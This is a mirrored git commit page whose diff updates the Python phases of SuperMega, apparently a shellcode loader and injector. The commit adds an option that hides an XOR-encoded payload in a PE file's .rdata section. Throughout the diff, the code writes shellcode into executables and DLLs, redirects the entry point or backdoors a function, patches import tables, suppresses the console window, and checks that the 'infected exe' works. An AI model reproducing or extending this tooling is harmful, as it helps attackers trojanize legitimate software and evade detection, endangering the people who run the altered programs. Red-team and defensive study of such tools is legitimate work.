admin/SuperMega
1
0
Fork 0
mirror of https://github.com/dobin/SuperMega synced 2026-06-02 17:27:10 +00:00
Code Issues Packages Projects Releases Wiki Activity

feature: put payload into .rdata option

Browse Source
This commit is contained in:
Dobin
2024-05-09 21:04:37 +01:00
parent 3aa79afd70
commit 900c145557
16 changed files with 178 additions and 78 deletions
Download Patch File Download Diff File Expand all files Collapse all files
phases/asmparser.py
+40 -16
View File
@@ -2,13 +2,13 @@ import os
from typing import List, Dict
from helper import *
from model import *
from model.carrier import Carrier, DataReuseEntry, IatRequest
from model.settings import Settings
logger = logging.getLogger("AsmParser")
def parse_asm_file(carrier: Carrier, asm_text: str) -> List[str]:
def parse_asm_file(carrier: Carrier, asm_text: str, settings: Settings) -> List[str]:
lines_out = []
lines = asm_text.split("\n")
@@ -34,6 +34,11 @@ def parse_asm_file(carrier: Carrier, asm_text: str) -> List[str]:
lines_out.append(line)
continue
if tokens[0] == "COMM":
# HACK atm. Will be handled by masm_shc
# gives false positives for supermega_payload
continue
# PATCH SHORT
if "jmp\tSHORT" in line:
updated_line = line.replace("SHORT", "")
@@ -53,23 +58,42 @@ def parse_asm_file(carrier: Carrier, asm_text: str) -> List[str]:
## mov rdi, QWORD PTR supermega_payload
## to
## lea rdi, [shcstart] ; get payload shellcode address
if "supermega_payload" in line:
updated_line = line
updated_line = updated_line.replace(
"mov ",
"lea "
)
updated_line = updated_line.replace(
"QWORD PTR supermega_payload",
"[shcstart] ; get payload shellcode address"
)
lines_out.append(updated_line)
continue
if settings.payload_location == PayloadLocation.CODE:
if "supermega_payload" in line:
updated_line = line
updated_line = updated_line.replace(
"mov ",
"lea "
)
updated_line = updated_line.replace(
"QWORD PTR supermega_payload",
"[shcstart] ; get payload shellcode address"
)
lines_out.append(updated_line)
continue
elif settings.payload_location == PayloadLocation.DATA:
if "supermega_payload" in line:
randbytes: bytes = os.urandom(7) # LEA is 7 bytes
string_ref = "supermega_payload"
datareuse_fixup = carrier.get_reusedata_fixup(string_ref)
if datareuse_fixup == None:
raise Exception("Data reuse entry not found: {}".format(string_ref))
register = line.split("mov\t")[1].split(",")[0]
datareuse_fixup.register = register
datareuse_fixup.randbytes = randbytes
line = bytes_to_asm_db(randbytes) + " ; .rdata Payload".format()
lines_out.append(line)
continue
else:
raise Exception("Unknown payload location: {}".format(settings.payload_location))
# ADD label at end of code
# we cant reliably identify in which function, so we just add it at the end
## get_time_raw ENDP
## <---- add here
## -> add here
## _TEXT ENDS
## END
if line_idx > len(lines) - 5 and tokens[1] == "ENDP":
@@ -128,7 +152,7 @@ def parse_asm_file(carrier: Carrier, asm_text: str) -> List[str]:
register = line.split("lea\t")[1].split(",")[0]
randbytes: bytes = os.urandom(7)
datareuse_fixup = carrier.get_all_reusedata_fixup(string_ref)
datareuse_fixup = carrier.get_reusedata_fixup(string_ref)
if datareuse_fixup == None:
raise("Data reuse entry not found: {}".format(string_ref))
phases/assembler.py
+13 -7
View File
@@ -30,15 +30,21 @@ def merge_loader_payload(
payload_data: bytes,
decoder_style: DecoderStyle
) -> bytes:
if decoder_style == DecoderStyle.PLAIN_1:
# Nothing to do
pass
elif decoder_style == DecoderStyle.XOR_1:
xor_key = config.xor_key
logger.info("---[ XOR payload with key 0x{:X}".format(xor_key))
payload_data = bytes([byte ^ xor_key for byte in payload_data])
payload_data = encode_payload(payload_data, decoder_style)
logger.info("---[ Size: Carrier: {} and Payload: {} Sum: {} ".format(
len(shellcode_in), len(payload_data), len(shellcode_in)+len(payload_data)))
return shellcode_in + payload_data
def encode_payload(payload: bytes, decoder_style: DecoderStyle) -> bytes:
if decoder_style == DecoderStyle.PLAIN_1:
return payload
elif decoder_style == DecoderStyle.XOR_1:
xor_key = config.xor_key
logger.info("---[ XOR payload with key 0x{:X}".format(xor_key))
xored = bytes([byte ^ xor_key for byte in payload])
return xored
else:
raise Exception("Unknown decoder style")
phases/compiler.py
+4 -2
View File
@@ -11,6 +11,7 @@ from model import *
from phases.masmshc import masm_shc, Params
from model.carrier import Carrier
from phases.asmparser import parse_asm_file
from model.settings import Settings
logger = logging.getLogger("Compiler")
@@ -21,7 +22,7 @@ def compile_dev(
asm_out: FilePath,
short_call_patching: bool = False,
):
logger.info("--[ Compile C to ASM: {} -> {} ".format(c_in, asm_out))
logger.info("--( Compile C to ASM: {} -> {} ".format(c_in, asm_out))
# Compile C To Assembly (text)
run_process_checkret([
@@ -51,6 +52,7 @@ def compile(
c_in: FilePath,
asm_out: FilePath,
carrier: Carrier,
settings: Settings,
):
logger.info("--[ Compile C to ASM: {} -> {} ".format(c_in, asm_out))
@@ -68,7 +70,7 @@ def compile(
asm_text = file_readall_text(asm_out)
observer.add_text_file("carrier_asm_orig", asm_text)
asm_text_lines = parse_asm_file(carrier, asm_text) # Fixup assembly file
asm_text_lines = parse_asm_file(carrier, asm_text, settings) # Fixup assembly file
asm_text = masm_shc(asm_text_lines) # Cleanup assembly file
observer.add_text_file("carrier_asm_final", asm_text)
phases/injector.py
+49 -29
View File
@@ -45,15 +45,19 @@ def inject_exe(
# Patch IAT if necessary
if source_style == FunctionInvokeStyle.iat_reuse:
for iatRequest in carrier.get_all_iat_requests():
# skip available
addr = superpe.get_vaddr_of_iatentry(iatRequest.name)
if addr != None:
logger.info(" IAT {} is at: 0x{:X}".format(iatRequest.name, addr))
continue
iat_name = superpe.get_replacement_iat_for("KERNEL32.dll", iatRequest.name)
superpe.patch_iat_entry("KERNEL32.dll", iat_name, iatRequest.name)
superpe.pe.parse_data_directories()
shellcode_offset: int = 0 # file offset
if superpe.is_dll() and settings.dllfunc != "" and carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
# Special case: DLL exported function direct overwrite
logger.info("--[ Overwrite DLL function {} with shellcode".format(settings.dllfunc))
logger.info("---[ Inject DLL: Overwrite exported function {} with shellcode".format(settings.dllfunc))
rva = superpe.getExportEntryPoint(settings.dllfunc)
# Size and sanity checks
@@ -65,7 +69,7 @@ def inject_exe(
# Inject
shellcode_offset = superpe.get_offset_from_rva(rva)
logger.info(f'---[ Using DLL Export "{settings.dllfunc}" at RVA 0x{rva:X} offset 0x{shellcode_offset:X} to overwrite')
logger.info(f'----[ Using DLL Export "{settings.dllfunc}" at RVA 0x{rva:X} offset 0x{shellcode_offset:X} to overwrite')
superpe.pe.set_bytes_at_offset(shellcode_offset, main_shc)
else: # Put it somewhere in the code section, and rewire the flow
@@ -81,58 +85,58 @@ def inject_exe(
shellcode_offset += sect.PointerToRawData
shellcode_rva = superpe.pe.get_rva_from_offset(shellcode_offset)
logger.info("--( Inject: Shellcode rva:0x{:X} (from offset:0x{:X})".format(
shellcode_rva, shellcode_offset))
logger.info("---( Inject: Write Shellcode to offset:0x{:X} (rva:0x{:X})".format(
shellcode_offset, shellcode_rva))
# Copy the shellcode
superpe.pe.set_bytes_at_offset(shellcode_offset, main_shc)
# rewire flow
if superpe.is_dll() and settings.dllfunc != "":
logger.info("---( Rewire: DLL function: {} ".format(settings.dllfunc))
if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
# Handled above, without arriving here
# Handled above
raise Exception("We should not land here")
elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr:
addr = superpe.getExportEntryPoint(settings.dllfunc)
logger.info("--( Inject DLL: Patch {} (0x{:X})".format(
logger.info("---( Inject DLL: Backdoor {} (0x{:X})".format(
settings.dllfunc, addr))
function_backdoorer.backdoor_function(addr, shellcode_rva, shellcode_len)
else: # EXE
logger.info("---( Rewire: EXE")
if carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint:
logger.info("--( Inject EXE: Change Entry Point to 0x{:X}".format(
logger.info("---( Inject EXE: Change Entry Point to 0x{:X}".format(
shellcode_rva))
superpe.set_entrypoint(shellcode_rva)
elif carrier_invoke_style == CarrierInvokeStyle.BackdoorCallInstr:
addr = superpe.get_entrypoint()
logger.info("--( Inject EXE: Patch from entrypoint (0x{:X})".format(
logger.info("---( Inject EXE: Backdoor function at entrypoint (0x{:X})".format(
addr))
function_backdoorer.backdoor_function(addr, shellcode_rva, shellcode_len)
if source_style == FunctionInvokeStyle.iat_reuse:
logger.info("--( Fix shellcode to re-use IAT entries")
injected_fix_iat(superpe, carrier)
injected_fix_data(superpe, carrier)
logger.info("--( Fix shellcode to reference data stored in .rdata")
injected_fix_data(superpe, carrier)
# changes from console to UI (no console window) if necessary
superpe.patch_subsystem()
# We done
logger.info("--( Write to file: {}".format(exe_out))
superpe.write_pe_to_file(exe_out)
# verify and log
#shellcode = file_readall_binary(shellcode_in)
#shellcode_len = len(shellcode)
#code = extract_code_from_exe_file(exe_out)
#in_code = code[function_backdoorer.shellcodeOffsetRel:function_backdoorer.shellcodeOffsetRel+shellcode_len]
code = file_readall_binary(exe_out)
in_code = code[shellcode_offset:shellcode_offset+shellcode_len]
#jmp_code = code[function_backdoorer.backdoorOffsetRel:function_backdoorer.backdoorOffsetRel+12]
#if config.debug:
# observer.add_code_file("exe_extracted_loader", in_code)
observer.add_code_file("exe_extracted_carrier", in_code)
# observer.add_code_file("exe_extracted_jmp", jmp_code)
@@ -150,10 +154,12 @@ def injected_fix_iat(superpe: SuperPe, carrier: Carrier):
raise Exception("IatResolve: Function {} not found".format(iatRequest.name))
instruction_virtual_address = offset_from_code + carrier.superpe.get_image_base() + carrier.superpe.get_code_section().VirtualAddress
logger.info(" Replace {} at VA 0x{:X} with: call to IAT at VA 0x{:X}".format(
logger.info(" Replace {} at VA 0x{:X} with: call to IAT at VA 0x{:X}".format(
iatRequest.placeholder.hex(), instruction_virtual_address, destination_virtual_address
))
jmp = assemble_relative_call(instruction_virtual_address, destination_virtual_address)
if len(jmp) != len(iatRequest.placeholder):
raise Exception("IatResolve: Call to IAT has different length than placeholder, abort")
code = code.replace(iatRequest.placeholder, jmp)
superpe.write_code_section_data(code)
@@ -185,40 +191,53 @@ def injected_fix_data(superpe: SuperPe, carrier: Carrier):
rm.add_range(peSection.virt_addr, peSection.virt_addr + string_off)
# Do all .rdata patches
logger.info("---( Patch: .rdata")
for datareuse_fixup in reusedata_fixups:
logger.info(" Handling DataReuse Fixup: {} <- {}".format(
datareuse_fixup.string_ref, datareuse_fixup.randbytes.hex()))
# get a hole in the .rdata section to put our data
hole = rm.find_hole(len(datareuse_fixup.data))
if hole == None:
hole_rva = rm.find_hole(len(datareuse_fixup.data))
if hole_rva == None:
raise Exception("No suitable hole with size {} found in .rdata section, abort".format(
len(datareuse_fixup.data)
))
fixup_offset_rdata = hole[0] # the start address of the hole (from start of .rdata)
rm.add_range(hole[0], hole[1]) # mark it as used
rm.add_range(hole_rva[0], hole_rva[1]+1) # mark it as used
var_data = datareuse_fixup.data
superpe.pe.set_bytes_at_offset(fixup_offset_rdata, var_data)
datareuse_fixup.addr = fixup_offset_rdata + peSection.virt_addr + carrier.superpe.get_image_base() - peSection.raw_addr
logging.info(" Add data to .rdata at 0x{:X} (off: {}): {}".format(
datareuse_fixup.addr, fixup_offset_rdata, var_data.decode('utf-16le')))
fixup_offset_rdata += len(var_data) + 8
data_rva = hole_rva[0]
superpe.pe.set_bytes_at_rva(data_rva, var_data)
datareuse_fixup.addr = data_rva + carrier.superpe.get_image_base()
if len(var_data) <= 32: # show strings (hope they are less than that, and shellcode is larger)
logging.info(" Add to .rdata at 0x{:X} ({}): {}: {}".format(
datareuse_fixup.addr, data_rva, datareuse_fixup.string_ref, var_data.decode("utf-16le")))
else:
logging.info(" Add to .rdata at 0x{:X} ({}): {}: Data with len {}".format(
datareuse_fixup.addr, data_rva, datareuse_fixup.string_ref, len(var_data)))
# patch code section
# replace the placeholder with a LEA instruction to the data we written above
logger.info("---( Patch: .text")
code = superpe.get_code_section_data()
for datareuse_fixup in reusedata_fixups:
if not datareuse_fixup.randbytes in code:
raise Exception("DataReuse: ID {} not found, abort".format(
datareuse_fixup.randbytes))
raise Exception("fix data in injectable: DataReuse: ID {} ({}) not found in code section, abort".format(
datareuse_fixup.randbytes.hex(), datareuse_fixup.string_ref))
offset_from_datasection = code.index(datareuse_fixup.randbytes)
instruction_virtual_address = offset_from_datasection + carrier.superpe.get_image_base() + carrier.superpe.get_code_section().VirtualAddress
destination_virtual_address = datareuse_fixup.addr
logger.info(" Replace {} at VA 0x{:X} with LEA {} .rdata 0x{:X}".format(
logger.info(" Replace bytes {} at VA 0x{:X} with: LEA {} .rdata 0x{:X}".format(
datareuse_fixup.randbytes.hex(), instruction_virtual_address, datareuse_fixup.register, destination_virtual_address
))
lea = assemble_lea(
instruction_virtual_address, destination_virtual_address, datareuse_fixup.register
)
asm_disasm(lea, instruction_virtual_address) # DEBUG
if len(lea) != len(datareuse_fixup.randbytes):
raise Exception("IatResolve: Call to IAT has different length than placeholder, abort")
code = code.replace(datareuse_fixup.randbytes, lea)
superpe.write_code_section_data(code)
@@ -238,3 +257,4 @@ def verify_injected_exe(exefile: FilePath, dllfunc="") -> int:
logger.error("---> Verify FAIL. Infected exe does not work (no file created)")
return 1
phases/templater.py
+2 -1
View File
@@ -11,7 +11,8 @@ logger = logging.getLogger("Assembler")
def create_c_from_template(settings: Settings, payload_len: int):
logger.info("--[ Create C from template")
logger.info("--( Create C from template: {} -> {}".format(
PATH_DECODER, settings.main_c_path))
plugin_decoder = ""
# Decoder